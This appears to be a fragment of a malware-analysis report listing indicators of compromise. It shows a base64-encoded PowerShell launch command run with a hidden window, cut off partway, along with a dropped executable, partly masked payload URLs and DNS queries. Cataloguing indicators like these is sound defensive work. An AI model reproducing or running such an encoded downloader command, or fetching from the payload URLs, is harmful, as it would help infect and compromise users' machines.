Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAEIAUgBFAEwAegBxAG8APQAnAFAARwBTAEoAWQBlAGoAZgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABDAHUAUgBpAGAAVABgAFkAYABQAFIAYABPAHQATwBjAE8ATAAiAC...
- %HOMEPATH%\858.exe
- %HOMEPATH%\858.exe
- http://mi###ocha2u.com/ehlmy/LHZQclWq/
- http://bl###ingbow.com/temp/pVFQL089825/
- DNS ASK mi###ocha2u.com
- DNS ASK pn##a.com
- DNS ASK bl###ingbow.com
- DNS ASK go#####kstoneshop.com
- DNS ASK ne###ick4u.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAEIAUgBFAEwAegBxAG8APQAnAFAARwBTAEoAWQBlAGoAZgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABDAHUAUgBpAGAAVABgAFkAYABQAFIAYABPAHQATwBjAE8ATAAiAC...' (with hidden window)